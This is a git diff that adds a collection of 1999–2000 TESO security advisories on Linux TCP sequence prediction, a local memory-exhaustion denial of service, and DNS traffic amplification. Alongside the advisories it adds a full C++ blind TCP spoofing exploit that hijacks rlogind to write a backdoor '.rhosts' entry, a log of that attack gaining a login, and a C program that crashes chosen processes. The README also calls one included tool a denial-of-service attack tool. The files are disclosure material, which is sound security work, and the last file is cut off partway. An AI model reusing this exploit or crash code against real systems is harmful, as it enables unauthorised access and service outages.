initial

41 files changed, 6355 insertions, 0 deletions

diff --git a/advisories/teso-advisory-001/advisory-001.txt b/advisories/teso-advisory-001/advisory-001.txt
new file mode 100644
index 0000000..128de64
--- /dev/null
+++ b/advisories/teso-advisory-001/advisory-001.txt
@@ -0,0 +1,225 @@
+
+------
+
+TESO Security Advisory
+26/09/1999
+
+Linux Kernel 2.2.x ISN Vulnerability
+
+
+Summary
+===================
+
+    A weakness within the TCP stack in Linux 2.2.x kernels has been
+    discovered. The vulnerability makes it possible to "blind-spoof" TCP
+    connections.
+    It's therefore possible for an attacker to initiate a TCP connection
+    from an arbitrary non existing or unresponding IP source address,
+    exploiting IP address based access control mechanisms.
+
+    Linux 2.0.x kernels were tested against this attack and found not to
+    be vulnerable in any case.
+
+
+Systems Affected
+===================
+
+    All systems running the kernel versions 2.2.x of the Linux operating
+    system. Linux 2.3.x systems may be affected, too, we didn't tested
+    this versions.
+
+    In our test situations we noticed that it doesn't seem to matter
+    whether the TCP syncookie functionality was enabled or not (enabled
+    within the kernel and activated through the proc filesystem options).
+
+
+Tests
+===================
+
+    This is the beginning of a log of a successfully mounted blind TCP
+    spoofing attack agains a Linux 2.2.12 system.
+    (tcpdump output formatted for better readability)
+
+    16:23:02.727540 attacker.522  > victim.ssh  : S  446679473: 446679473(0)
+    16:23:02.728371 victim.ssh    > attacker.522: S 3929852318:3929852318(0)
+    16:23:02.734448 11.11.11.11.522 > victim.ssh: S  446679473: 446679473(0)
+    16:23:02.734599 victim.ssh > 11.11.11.11.522: S 3929859164:3929859164(0)
+    16:23:03.014941 attacker.522  >   victim.ssh: R  446679474: 446679474(0)
+    16:23:05.983368 victim.ssh > 11.11.11.11.522: S 3929859164:3929859164(0)
+    16:23:06.473192 11.11.11.11.522 > victim.ssh: . ack 3929855318
+    16:23:06.473427 victim.ssh > 11.11.11.11.522: R 3929855318:3929855318(0)
+    16:23:06.554958 11.11.11.11.522 > victim.ssh: . ack 3929855319
+    16:23:06.555119 victim.ssh > 11.11.11.11.522: R 3929855319:3929855319(0)
+    16:23:06.637731 11.11.11.11.522 > victim.ssh: . ack 3929855320
+    16:23:06.637909 victim.ssh > 11.11.11.11.522: R 3929855320:3929855320(0)
+    ...
+
+    The first ISN of the victim's host is 3929852318, which is within a SYNACK
+    packet to the attackers host. This is unspoofed and can be easily snagged
+    by the attacker.
+    At the same time the attacker sent out the first unspoofed SYN packet he
+    sent a spoofed SYN packet from 11.11.11.11 too. This packet is answered
+    by the victims host too with the ISN of 3929859164.
+    The difference between the first visible ISN and the second ISN is only
+    (3929859164-3929852318) = 6846.
+
+    Please notice that all TCP and IP parameters of the spoofed packet, except
+    for the IP source address are the same as of the unspoofed packet. This is
+    important (see below).
+
+    This small differences within the initial TCP sequence number (ISN) is
+    exploitable. In other tests, where both hosts were unlagged we even had
+    differences below 500 sometimes.
+
+    We've managed to successfully blind spoof TCP connections on different
+    Linux 2.2.x systems, that is reaching the TCP "ESTABLISHED" state without
+    being able to sniff the victim host.
+
+
+Impact
+===================
+
+    By sending packets from a trusted source address, attackers could possibly
+    bypass address based authentication and security mechanisms.
+
+    There have been similiar exploiting technics, aimed especially at r* and
+    NFS services, in the past that demonstrated the security impact of weak
+    ISNs very well.
+    We have written a working exploit to demonstrate the weakness.
+
+
+Explanation
+===================
+
+    The problem relies on a implementation flaw within the random ISN algorithm
+    in the Linux kernel.
+
+    The problem is within drivers/char/random.c, line 1684:
+
+    __u32 secure_tcp_sequence_number(__u32 saddr, __u32 daddr,
+                                     __u16 sport, __u16 dport)
+    {
+            ...
+            static __u32    secret[12];
+            ...
+            secret[0]=saddr;
+            secret[1]=daddr;
+            secret[2]=(sport << 16) + dport;
+
+            seq = (halfMD4Transform(secret+8, secret) &
+                   ((1<<HASH_BITS)-1)) + count;
+            ...
+    }
+
+    As already said, in our spoofed TCP SYN packet only the IP source address
+    differs, that is only secret[0], so of 12*4 random bytes used to create the
+    sequence number from, only 4 bytes differ.
+    Obviously the hash created by halfMD4Transform has similarities if the
+    source and destination ports and the destination address are the same.
+
+    It seems that the src-adress is least-significant to the above MD4
+    algorithm. Changing the source-ports too, makes the 2 ISNs more differ.
+    Due to the short gap of time, the last
+
+            seq += tv.tv_usec + tv.tv_sec*1000000;
+
+    is useless. This may be the reason why this bug may have survived long:
+    In any real network situation it is uncommon that the source and
+    destination ports are equal in two different connections on one host.
+
+    Further analyzation of the hash algorithm in this routine may result in a
+    better ISN prediction than the one we use (range prediction).
+
+
+Solution
+===================
+
+    First: It's always unwise to rely on address based authentication,
+           because in a sniffable enviroment, such as the Internet, there
+           are always means of bypassing address based authentication.
+
+    Second: The press shouldn't hype this as _THE_ Linux bug.. everyone having
+            looked at the ISNs/DNS Sequence numbers of any of Microsoft's
+            operating systems knows that their 'random numbers' are _much_
+            easier targets to use for IP and DNS spoofing attacks. For a
+            a description how the ISN numbers of the Microsoft Windows NT
+            TCP stack have even weakened with the latest Service Packs, you
+            may want to browse the latest postings to the Bugtraq security
+            mailing list [1] or read [2].
+            Well.. not that it matters.. but who uses Microsoft software
+            anyway ?
+
+    The Linux kernel developers have been notified at the same time as the
+    public Linux community, so a safe patch should be available real soon.
+
+
+Acknowledgments
+================
+
+    The bugdiscovery and the exploit is due to:
+
+    Stealth    http://www.kalug.lug.net/stealth
+    S. Krahmer http://www.cs.uni-potsdam.de/homepages/students/linuxer
+
+    This advisory has been written by typo and scut.
+    The tests and further analyzation were done by stealth and scut.
+    The demonstration exploit has been written by S. Krahmer.
+
+
+Contact Information
+===================
+
+    The teso crew can be reached by mailing to teso@shellcode.org.
+    Our webpage is at http://teso.scene.at/
+
+
+References
+===================
+
+    [1] Mail to the Bugtraq mailing list
+        From: Roy Hills <bugtraq-l@NTA-MONITOR.COM>
+        Subject: NT Predictable Initial TCP Sequence numbers - changes observed
+                 with SP4
+
+    [2] Microsoft Knowledge Database Article
+        ID: Q192292 "Unpredictable TCP Sequence Numbers in SP4".
+
+    [3] libUSI++, a spoofing library
+        http://www.cs.uni-potsdam.de/homepages/students/linuxer/
+
+    [4] TESO
+        http://teso.scene.at/
+
+    [5] S. Krahmer
+        http://www.cs.uni-potsdam.de/homepages/students/linuxer
+
+
+Disclaimer
+===================
+
+    This advisory does not claim to be complete or to be usable for any
+    purpose. Especially information on the vulnerable systems may be
+    inaccurate or wrong. The supplied exploit is not to be used for malicious
+    purposes, but for educational purposes only.
+
+    This advisory is free for open distribution in unmodified form.
+    Articles that are based on information from this advisory should include
+    link [4] and [5].
+
+
+Exploit
+===================
+
+    We've created a working exploit to demonstrate the vulnerability.
+    The exploit needs libUSI++ installed, which can be obtained through [3].
+
+    The exploit is available from either
+
+       http://teso.scene.at/
+    or
+       http://www.cs.uni-potsdam.de/homepages/students/linuxer/
+
+
+------
+
+
diff --git a/advisories/teso-advisory-001/blindSpoof.cc b/advisories/teso-advisory-001/blindSpoof.cc
new file mode 100644
index 0000000..cb4620b
--- /dev/null
+++ b/advisories/teso-advisory-001/blindSpoof.cc
@@ -0,0 +1,208 @@
+/*** Exploit for the 2.2 linux-kernel TCP/IP weakness. 
+ *** (C) 1999 by S. Krahmer. 
+ *** THERE IS ABSOLUTELY NO WARRANTY. YOU USE IT AT YOUR OWN RSIK!
+ *** THIS PROGRAM IS LICESED UNDER THE GPL and belongs to a security-
+ *** advisory of team teso. You should get the full advisory with paper
+ *** on either 
+ *** http://www.cs.uni-potsdam.de/homepages/students/linuxer or
+ *** http://teso.scene.at
+ ***
+ *** The bugdiscovery and the exploit is due to:
+ ***
+ *** Stealth    http://www.kalug.lug.net/stealth
+ *** S. Krahmer http://www.cs.uni-potsdam.de/homepages/students/linxuer
+ ***
+ *** c++ blindSpoof.cc -lusi++ -lpcap   (this is LINUX source!)
+ *** Libusi++ is available on my homepage.
+ *** Achtung: Gehen Sie nicht in den 100 Meilen tiefen Wald! ;-)
+ ***/
+#include <stdio.h>
+#include <iostream>
+#include <stdlib.h>
+#include <unistd.h>
+#include <string.h>
+#include <signal.h>
+#include <usi++/usi++.h>
+
+#define XPORT 513
+
+// may be changed, my best results were around 2000,
+// but also diffs of > 5000 can happen :)
+// change it it really not works
+#define MAXPACK 3000
+
+// define this if you want to exploit rlogind
+// if not, you will just spoof a connection to XPORT
+#define EXPLOIT_RLOGIND 
+
+// uses eth0 for packet-capturing!
+TCP *pingVictum(char *, char *, char *);
+int printInfo(TCP *);
+bool wrongPacket(TCP *, TCP *);
+
+int main(int argc, char **argv)
+{
+        // yes, script-kidz! this is hardcoded to prevent you from usage.
+        const char *remoteUser = "stealth",
+                   *localUser  = "stealth",
+                   *command    = "echo liane root>>~/.rhosts\n";
+        char sbuf[1000];
+        
+        if (argc < 4) {
+                printf("Usage %s [destination-IP] [source-IP] [spoofed-IP]\n", argv[0]);
+                exit(1);
+        }
+        cout<<"blindSpoof-exploit by S. Krahmer\n"
+              "http://www.cs.uni-potsdam.de/homepages/students/linuxer\n\n";    
+        // would be connect() 
+        TCP *conn = pingVictum(argv[1], argv[2], argv[3]);
+
+#ifdef EXPLOIT_RLOGIND
+        conn->set_flags(0);
+        sprintf(sbuf, "\0");
+        conn->sendpack(sbuf, 1);
+        sleep(1);
+        
+        cout<<"Sending local username: "<<localUser<<endl;
+        
+        // send local username
+        conn->set_seq(conn->get_seq() + 1);
+        memset(sbuf, 0, 1000);
+        snprintf(sbuf, sizeof(sbuf), "%s\0", localUser);
+        conn->sendpack(sbuf, strlen(sbuf) + 1);
+        
+        // we don't know about the lag, so i hope that 7 in sec.
+        // the victum has sent an ACK
+        sleep(7);
+        
+        cout<<"Sending remote username: "<<remoteUser<<endl;
+        
+        // send remote username
+        conn->set_seq(conn->get_seq() + strlen(sbuf) + 1);
+        memset(sbuf, 0, sizeof(sbuf));
+        snprintf(sbuf, sizeof(sbuf), "%s\0", remoteUser);
+        conn->sendpack(sbuf, strlen(sbuf) + 1);
+        sleep(7);
+        
+        cout<<"Sending terminal-type and speed.\n";
+        conn->set_seq(conn->get_seq() + strlen(sbuf) + 1);
+        memset(sbuf, 0, sizeof(sbuf));
+        snprintf(sbuf, sizeof(sbuf), "%s\0", "linux/38400");
+        conn->sendpack(sbuf, strlen(sbuf) + 1);
+        sleep(7);
+        
+        
+        cout<<"Sending command: "<<command<<endl;
+        conn->set_seq(conn->get_seq() + strlen(sbuf) + 1);
+        memset(sbuf, 0, sizeof(sbuf));
+        snprintf(sbuf, sizeof(sbuf), "%s\0", command);
+        conn->sendpack(sbuf, strlen(sbuf) + 1);
+#else
+        cout<<"Connection to port "<<XPORT<<" should be established.\n";
+#endif
+        delete conn;
+        return 0;
+}
+
+/* Spoof a connection. */
+TCP *pingVictum(char *host, char *src, char *spoofed)
+{
+        char buf[100];
+        TCP *victumLow = new TCP(host),
+            *victumSpoofed = new TCP(host),
+            *sn = new TCP(host);    
+        int myISN = rand(), sport = 512 + rand()%512;
+        
+        sn->init_device("eth0", 1, 500);
+
+        victumLow->set_flags(TH_SYN);
+        victumLow->set_dstport(XPORT);  // rlogin
+        victumLow->set_srcport(sport);  // from a privileged port
+        victumLow->set_src(src);                
+        victumLow->set_seq(myISN);
+                
+        victumSpoofed->set_flags(TH_SYN);
+        victumSpoofed->set_dstport(XPORT);      
+        victumSpoofed->set_srcport(sport);      
+        victumSpoofed->set_src(spoofed);
+        victumSpoofed->set_seq(myISN);          // we must save the ISN
+        
+        // send SYN to get low end of ISN
+        victumLow->sendpack("");
+                
+        // send spoofed SYN 
+        victumSpoofed->sendpack("");
+        
+        cout<<"Using sourceport "<<victumSpoofed->get_srcport()<<endl;
+        
+        // wait for SYN/ACK of low packet
+        while (wrongPacket(sn, victumLow)) {
+                sn->sniffpack(buf, 100);
+                printf("%s:%d -> %s:%d ", sn->get_src(1), sn->get_srcport(),
+                                          sn->get_dst(1), sn->get_dstport());
+                printInfo(sn);
+        }
+        int lowISN = sn->get_seq();             
+        sleep(2);
+        
+        // NOTE! Even if we sent the SYN before the spoofed SYN, the
+        // spoofed SYN can arrive first, due to routing reasons.
+        // Althought this is NOT very likely, we have to keep it in mind.
+        cout<<"Low end: "<<(unsigned)lowISN<<"\n";      
+        victumSpoofed->set_flags(TH_ACK);
+        victumSpoofed->set_seq(myISN + 1);
+
+        //      
+        for (int i = lowISN; i < lowISN + MAXPACK; i++) {
+                victumSpoofed->set_ack(i);
+                victumSpoofed->sendpack("");
+                printf("%u\r", i); fflush(stdout);
+                // maybe you have to place a usleep() here, depends on
+                // your devices
+        }
+        cout<<endl;
+        delete sn;
+        delete victumLow;
+        
+        // from now, the connection should be established!
+        return victumSpoofed;
+}
+
+
+// give out some infos about the received packet
+int printInfo(TCP* r)
+{
+        cout<<"[flags: ";
+        if (r->get_flags() & TH_FIN)
+                cout<<"FIN ";
+        if (r->get_flags() & TH_SYN)
+                cout<<"SYN ";
+        if (r->get_flags() & TH_RST)
+                cout<<"RST ";
+        if (r->get_flags() & TH_PUSH)
+                cout<<"PUSH ";
+        if (r->get_flags() & TH_ACK)
+                cout<<"ACK ";
+        if (r->get_flags() & TH_URG)
+                cout<<"URG ";
+        cout<<"] [ACK: "<<r->get_ack()<<"] [SEQ: "<<r->get_seq()<<"]"<<endl;
+        return 0;
+}
+
+/* returns true is packet is WRONG
+ */
+bool wrongPacket(TCP *p1, TCP *p2)
+{
+        if (p1->get_src() != p2->get_dst())
+                return true;
+        if (p1->get_dst() != p2->get_src())
+                return true;
+        if (p1->get_dstport() != p2->get_srcport())
+                return true;
+        if (p1->get_srcport() != p2->get_dstport())
+                return true;
+        if (p1->get_ack() != (p2->get_seq() + 1))
+                return true;
+        return false;
+}
+
diff --git a/advisories/teso-advisory-001/log b/advisories/teso-advisory-001/log
new file mode 100644
index 0000000..35de547
--- /dev/null
+++ b/advisories/teso-advisory-001/log
@@ -0,0 +1,29 @@
+[root@liane /root]# rlogin -l stealth lucifer
+Password:
+Password:
+^D
+
+Login incorrect
+rlogin: connection closed.
+[root@liane /root]# !c+
+c++ blindSpoof.cc  -lusi++ -lpcap
+[root@liane /root]# ./a.out lucifer liane alice
+blindSpoof-exploit by S. Krahmer
+http://www.cs.uni-potsdam.de/homepages/students/linxuer
+
+Using sourceport 996
+liane.c-skills.de:996 -> lucifer.c-skills.de:513 [flags: SYN ] [ACK: 1709299065] [SEQ: 642221920]
+alice:996 -> lucifer.c-skills.de:513 [flags: SYN ] [ACK: 1709299065] [SEQ: 642221920]
+lucifer.c-skills.de:513 -> liane.c-skills.de:996 [flags: SYN ACK ] [ACK: 642221921] [SEQ: 3072739429]
+Low end: 3072739429
+3072742428
+Sending local username: stealth
+Sending remote username: stealth
+Sending terminal-type and speed.
+Sending command: echo liane root>>~/.rhosts
+
+
+[root@liane /root]# rlogin -l stealth lucifer
+Last login: Sat Sep 25 16:17:50 from alice
+You have mail.
+lucifer:[stealth]>
diff --git a/advisories/teso-advisory-002/advisory-002.txt b/advisories/teso-advisory-002/advisory-002.txt
new file mode 100644
index 0000000..1deb1d8
--- /dev/null
+++ b/advisories/teso-advisory-002/advisory-002.txt
@@ -0,0 +1,150 @@
+
+------
+
+TESO Security Advisory
+01/09/2000
+
+Linux Kernel 2.0.x and 2.2.x local Denial of Service attack
+
+
+Summary
+===================
+
+    A weakness within the Linux 2.0.x and Linux 2.2.x kernels has been
+    discovered. The vulnerability allows any user without limits on the
+    system to crash arbitary processes, even those owned by the superuser.
+    Even system crashes can be experienced.
+
+
+Systems Affected
+===================
+
+    All systems running the kernel versions 2.0.x or 2.2.x of the Linux
+    operating system with local users who have no resource limits.
+    It is not enough to set special values only for the max. number of
+    processer per user ('forkbomb').
+    Linux 2.3.x systems may be affected, too, we didn't tested this versions.
+
+
+Tests
+===================
+
+    A system crash or the crash of particular processes can be reproduced
+    using the included exploit file "ml2.c", written by Stealth [3].
+    We've successfully managed to crash Linux 2.0.x and 2.2.x systems with
+    it.
+
+
+Impact
+===================
+
+    By crashing single processes or even crashing the whole system an attacker
+    may render the whole system unuseable to any other user (including
+    superuser) or selectivly kill only important processes, denying services
+    to legitimate use.
+
+
+Explanation
+===================
+
+    Any user can request a big amount of memory, 'stealing' required space for
+    important processes (syslogd, klogd, ...). Due to a lack of space, a
+    system-call of these processes that requires new space will fail. In
+    consequence this process will be killed by the kernel.
+    (see arch/{...}/mm/fault.c)
+
+    There should be a mechanism that protects a pool of memory for important
+    processes, which can only be accessed by the kernel itself or by processes
+    with (E)UID of 0. 
+
+    The real bad thing in this is that unlimited resources are the default-case
+    and kernel happily gives away all the space to these unlimited processes. 
+    In the kernel's eyes the process of luser foo has the same right/priority
+    for memory-requests as even init.
+    
+
+Solution
+===================
+
+    Since the problem can only be exploited by users who already have local
+    access, the best way to prevent this and other local attacks is to give
+    only those users access that can be trusted.
+
+    However this problem is within the Linux kernel and can definitely be
+    fixed.
+    As a general advice the administrator should heavily use resource-limits
+    for all 'dangerous' parts such as max. numbers of processes, max. memory
+    etc.. Also programs such as [4] should be used on important systems to
+    prevent local DoS attacks.
+
+    The Linux kernel developers have been notified at the same time as the
+    public Linux community, so a safe patch should be available real soon.
+
+
+Acknowledgments
+================
+
+    The bugdiscovery and further analyzation was done by
+
+    S. Krahmer http://www.cs.uni-potsdam.de/homepages/students/linuxer
+
+    The exploit is due to
+
+    Stealth    http://www.kalug.lug.net/stealth
+
+    This advisory has been written by scut and stealth.
+
+
+Contact Information
+===================
+
+    The teso crew can be reached by mailing to teso@shellcode.org.
+    Our webpage is at http://teso.scene.at/
+
+    C-skilled developers may be reached through [2].
+
+
+References
+===================
+
+    [1] TESO
+        http://teso.scene.at/
+
+    [2] S. Krahmer
+        http://www.cs.uni-potsdam.de/homepages/students/linuxer
+
+    [3] Stealth
+        http://www.kalug.lug.net/stealth/
+
+    [4] Fork Bomb Defuser
+        http://www.geocities.com/SiliconValley/Software/9197/rexfbd.htm
+
+
+Disclaimer
+===================
+
+    This advisory does not claim to be complete or to be usable for any
+    purpose. Especially information on the vulnerable systems may be
+    inaccurate or wrong. The supplied exploit is not to be used for malicious
+    purposes, but for educational purposes only.
+
+    This advisory is free for open distribution in unmodified form.
+    Articles that are based on information from this advisory should include
+    link [1] and [2].
+
+
+Exploit
+===================
+
+    We've created a working exploit to demonstrate the vulnerability.
+
+    The exploit is available on either
+
+       http://teso.scene.at/
+    or
+       http://www.cs.uni-potsdam.de/homepages/students/linuxer/
+
+
+------
+
+
diff --git a/advisories/teso-advisory-002/ml2.c b/advisories/teso-advisory-002/ml2.c
new file mode 100644
index 0000000..9ea7f43
--- /dev/null
+++ b/advisories/teso-advisory-002/ml2.c
@@ -0,0 +1,40 @@
+#include <stdio.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <syslog.h>
+
+#error
+
+int main(int argc, char **argv)
+{
+        char foo[1000];
+        char bigmsg[10000];
+        char *s, *hold_s; 
+        int i = 0;
+        
+        memset(bigmsg, 'X', sizeof(bigmsg)-1);
+        if (argc < 2) {
+                printf("usage: %s <pid to kill>\n", argv[0]);
+                exit(1);
+        }
+//      fork();
+        memset(foo, 0, sizeof(foo));
+        snprintf(foo, sizeof(foo), "/proc/%s/stat", argv[1]);
+        while (access(foo, F_OK) == 0) {
+                s = malloc(10000);
+                if (s == NULL) {
+                        if (hold_s)
+                                free(hold_s);
+/*                      if (s)
+                                s[i%10000] = 0;
+*/                      printf("crashing ... \n");
+                        openlog("b00m", 0, 0);
+                        syslog(1, bigmsg);
+                        closelog();
+                }
+                printf("%d\r", i++); fflush(stdout);
+                hold_s = s;
+        }
+        return 0;
+}
+
diff --git a/advisories/teso-advisory-003/advisory-003.txt b/advisories/teso-advisory-003/advisory-003.txt
new file mode 100644
index 0000000..be6bc78
--- /dev/null
+++ b/advisories/teso-advisory-003/advisory-003.txt
@@ -0,0 +1,258 @@
+
+------
+
+TESO Security Advisory
+02/11/2000
+
+Nameserver traffic amplify (DNS Smurf) and NS Route discovery (DNS Traceroute)
+
+
+Summary
+===================
+
+    Nameservers which accept and forward external DNS queries may be abused
+    as traffic amplifiers, exposing a possible threat to network integrity
+    by bandwidth saturation (DNS Smurf).
+
+    A "deaf" pseudo nameserver may be used to discover the query chain a
+    DNS query takes through various nameservers, allowing to make a trace-
+    route like route discovery (DNS Traceroute).
+
+
+Systems Affected
+===================
+
+    All type of nameservers which accept external queries. Especially those,
+    which forward the queries to other nameservers or those which have
+    excessive retry attempt values. The common value is to try three times,
+    but we have observed misconfigured servers which tried more then 20 times
+    sending out a query packet.
+
+    Note that this attack is completely different from the DNS Smurf attack
+    discovered by s0ftpr0ject [4], however, it exploits weaknesses in default
+    BIND [6] configurations too.
+
+
+Tests
+===================
+
+    The following data is an except from initial tests we have conducted
+    against some vulnerable nameserver.
+
+    08:07:24.943598 ns2.domain > victim.domain: 15121 (35)
+    08:07:32.747253 ns3.domain > victim.domain: 8536 (35)
+    08:07:32.832604 ns2.domain > victim.domain: 15121 (35)
+    08:07:39.819289 ns3.domain > victim.domain: 8536 (35)
+    08:07:40.670228 ns1.1025 > victim.domain: 56483 (35)
+    08:07:44.405556 ns4.domain > victim.domain: 5306 (35) (DF)
+    08:07:48.928981 ns2.domain > victim.domain: 15121 (35)
+    08:07:52.669825 ns1.1025 > victim.domain: 56483 (35)
+    08:07:56.107063 ns3.domain > victim.domain: 8536 (35)
+    08:07:56.471586 ns4.domain > victim.domain: 5306 (35) (DF)
+    08:08:04.938187 ns6.domain > victim.domain: 26706 (35)
+    08:08:12.372097 ns5.2187 > victim.domain: 2352 (35)
+    08:08:13.826464 ns6.domain > victim.domain: 26706 (35)
+    08:08:16.669021 ns1.1025 > victim.domain: 56483 (35)
+    08:08:20.603050 ns4.domain > victim.domain: 5306 (35) (DF)
+    08:08:24.365990 ns5.2187 > victim.domain: 2352 (35)
+    08:08:30.873233 ns6.domain > victim.domain: 26706 (35)
+      08:08:32.658479 ns1.domain > querier.1025: 298 ServFail 0/0/0 (35)
+    08:08:48.369725 ns5.2187 > victim.domain: 2352 (35)
+
+    The initial DNS query packet had a size of 35 bytes, although packets
+    up to a size of 500 bytes are possible.
+    As you can see there are five nameservers who indirectly got the query,
+    which was send by "querier" (query packet not displayed). The first name-
+    server that got queried was "ns1".
+
+    The query is forwarded to five other nameservers, so all together there are
+    six nameservers which try to resolve the query domain. If the query domain
+    is a normal existent domain name, the authoritative nameserver will answer
+    promptly and the answer is returned to the original query host.
+
+    This is the normal case. However, if there is an authoritative nameserver
+    which does not respond to the queries send to it, all nameservers will
+    retry to resolve the domain by sending out the query packet, assuming the
+    UDP packet they have previously sent got lost.
+    Because all six nameservers do this, this results in a traffic amplify
+    with factor 18 (18 packets send for each attacker packet).
+
+    Through testing a few hundred nameservers on this vulnerability we quickly
+    found nameservers which will amplify with ratios well beyond 30, sometimes
+    even exceeding 50.
+
+
+Impact
+===================
+
+    By abusing multiple nameserver-chains as traffic amplifiers an attacker can
+    easily saturate any network link. The traffic to the victim IP is caused by
+    the query packets which are sent by each nameserver in the nameserver-chain
+    to the fake authoritative nameserver in the victim network.
+
+    For the last few years denial of service (DoS) attacks that are based on
+    bandwidth saturation have always been a problem. A few years ago, when the
+    Smurf ICMP denial of service attack got publicly known nearly everyone was
+    able to saturate any link by abusing other networks as a traffic amplifier.
+    Since then numerous amplify attacks have been discovered, such as [3] and
+    [4], the original posting of the Smurf attack is [5].
+
+    Any method that allows an attacker to amplify his traffic can be abused for
+    a denial of service attack.
+
+
+Explanation
+===================
+
+    When a nameserver receives a query, most nameservers usually just start
+    forwarding the query to some other nameserver. There can be quite a long
+    path of forwarding queries. However if the query is not resolvable
+    because there is no nameserver listening on the remote host, every
+    forwarding nameserver will start to resolve it on their own, by querying
+    the authoritative nameserver themselves. In the default configuration each
+    nameserver will send the query three times, after 0, 12 and 24 seconds,
+    ymmv.
+
+    This can be used to discover the path of nameservers. To do this an
+    attacker would query the first nameserver for a domain he can see the
+    packets on, at best the domain points to the query host itself. Then he
+    would record all nameservers that send out a packet to himself. After
+    having done this he would try with another nameserver of the ones he got
+    queries from. In the best case he will receive queries from all hosts
+    but one missing. The missing one is the first host in the route. After
+    having reduced the list by one he will start over with the reduced list
+    until there is only one nameserver remaining, which is the last in the
+    querying chain.
+
+    Through seeking especially long paths, where a lot of nameservers are
+    queried, this can be abused as a traffic amplify bandwidth attack, as shown
+    above.
+
+    Since the important entries such as the NS entry is in the cache of each
+    nameserver after the first query, the attack is very fast pacing after the
+    first query, since no additional packets are sent to the attacker and the
+    attacker may spoof the UDP query packets. If the attacker is clever he
+    would use a very short lifetime for his NS entry, while using a long
+    lifetime for the victim subdomain. After the first query succeeded he will
+    just shut his nameserver down and send out spoofed query packets at a very
+    fast rate.
+
+
+Solution
+===================
+
+    "Defense is the best Offense" - said by a wise person. By protecting your
+    own nameservers against being abused by attackers you secure other sites at
+    the same time. If you run BIND [6] nameservers in your network please care
+    to read basic BIND configuration tutorials and especially documents on how
+    to secure your BIND configuration [7].
+
+    Also notice that you may fall victim to the same attack, if only one
+    nameserver in your network is vulnerable -- That means if only one
+    server is accepting queries for external domains from strangers, this
+    nameserver inside your network will send out trusted queries to other
+    nameservers in your network, and hence can be abused too.
+
+    By taking more generic measures against being the originator network of
+    denial of service attacks, such as improving your overall network security,
+    you contribute to the security of all other networks in the Internet too.
+    I urge you to subscribe to a security related mailing list, such as
+    Bugtraq [8] or, if you cannot afford the time necessary to read such a
+    list, at least subscribe to the CERT list [9].
+
+    In general there is no foolproof method to avoid getting a victim of a DNS
+    Smurf. But what can you do if you get attacked ?
+
+    To think of the correct response we have to think of why this attack works.
+    It works because other nameservers try to query a non-existent nameserver
+    in your network and don't get any response, hence retrying again. To just
+    filter DNS traffic to this IP is only of little use as a short-time
+    measure. Instead setting up a bogus DNS server on the victim IP address,
+    which replies with bogus answers to any query it receives will reduce the
+    impact of the attack.
+
+    However the real cause for the attack is still the number of misconfigured
+    DNS servers out there, which accept queries for external domains from
+    strangers. Another reason is the unreliable transport protocol which makes
+    it impossible for the nameserver to notice the unreachability of the remote
+    victim nameserver.
+
+
+Acknowledgments
+================
+
+    The bug discovery and the demonstration programs is due to TESO [1].
+
+    This advisory has been written by scut and hendy.
+    The tests and further analysis were done by scut.
+    The demonstration exploit has been written by scut.
+
+
+Contact Information
+===================
+
+    The TESO crew can be reached by mailing to teso@shellcode.org.
+    Our web page is at http://teso.scene.at/
+
+
+References
+===================
+
+    [1] TESO
+        http://teso.scene.at/
+
+    [2] Packetfactory
+        http://www.packetfactory.net/
+
+    [3] The "MAC DoS Attack", a x37 traffic amplify attack
+        posted on Bugtraq Mailing List 12/28/1999, discovered by John Copeland
+
+    [4] DNS Smurf (through query/answer ratio)
+        s0ftpr0ject Security Advisory SPJ-002-000, July 19, 1999
+        posted on Bugtraq Mailing List 07/30/1999, discovered by scacco
+
+    [5] ICMP ECHO Requests to Broadcast addresses (ICMP Smurf attack)
+        posted on Bugtraq Mailing List 07/19/1997, posting by Edward Henigin
+
+    [6] BIND nameserver software - Internet Software Consortium
+        http://www.isc.org/
+
+    [7] Securing Domain Name Service
+        Article on securityportal.com security related website
+        http://securityportal.com/cover/coverstory19990621.html
+
+    [8] Bugtraq Mailing List
+        http://www.securityfocus.com/about/feedback/subscribe-bugtraq.html
+
+    [9] CERT Mailing List
+        http://www.cert.org/contact_cert/certmaillist.html
+
+
+
+Disclaimer
+===================
+
+    This advisory does not claim to be complete or to be usable for any
+    purpose. Especially information on the vulnerable systems may be
+    inaccurate or wrong. The supplied exploit is not to be used for malicious
+    purposes, but for educational purposes only.
+
+    This advisory is free for open distribution in unmodified form.
+    Articles that are based on information from this advisory should include
+    link [1].
+
+
+Exploit
+===================
+
+    We've created a working demonstration program to exploit the vulnerability.
+    The program needs Libnet, a low level network library installed, which can
+    be obtained through [2].
+
+    The exploit is available from
+
+       http://teso.scene.at/
+
+------
+
+
diff --git a/advisories/teso-advisory-003/namesnake-0.0.2.tar.gz b/advisories/teso-advisory-003/namesnake-0.0.2.tar.gz
new file mode 100644
index 0000000..637bedc
--- /dev/null
+++ b/advisories/teso-advisory-003/namesnake-0.0.2.tar.gz
diff --git a/advisories/teso-advisory-003/namesnake/README b/advisories/teso-advisory-003/namesnake/README
new file mode 100644
index 0000000..448e2a3
--- /dev/null
+++ b/advisories/teso-advisory-003/namesnake/README
@@ -0,0 +1,20 @@
+rattlesnake and namesnake
+by team teso
+
+read the advisory in doc/ before asking stupid questions.
+
+namesnake is a tool to check whether a nameserver can be abused as a traffic
+amplifier. it is not fast, in fact it is very slow. i could've done it very
+fast, but since you are only going to check your local servers anyway, you
+shouldn't care, do you ?
+
+rattlesnake is a denial of service attack tool used to produce queries.
+usage should be obvious, if not reread the advisory.
+
+btw, for the compilation, you have to have libnet 1.x installed. the
+compilation errors (random/srandom) are caused by invalid libnet headers,
+i hope they will be fixed soon, so don't bug me about it.
+
+regards,
+scut / teso
+
diff --git a/advisories/teso-advisory-003/namesnake/doc/advisory-003.txt b/advisories/teso-advisory-003/namesnake/doc/advisory-003.txt
new file mode 100644
index 0000000..be6bc78
--- /dev/null
+++ b/advisories/teso-advisory-003/namesnake/doc/advisory-003.txt
@@ -0,0 +1,258 @@
+
+------
+
+TESO Security Advisory
+02/11/2000
+
+Nameserver traffic amplify (DNS Smurf) and NS Route discovery (DNS Traceroute)
+
+
+Summary
+===================
+
+    Nameservers which accept and forward external DNS queries may be abused
+    as traffic amplifiers, exposing a possible threat to network integrity
+    by bandwidth saturation (DNS Smurf).
+
+    A "deaf" pseudo nameserver may be used to discover the query chain a
+    DNS query takes through various nameservers, allowing to make a trace-
+    route like route discovery (DNS Traceroute).
+
+
+Systems Affected
+===================
+
+    All type of nameservers which accept external queries. Especially those,
+    which forward the queries to other nameservers or those which have
+    excessive retry attempt values. The common value is to try three times,
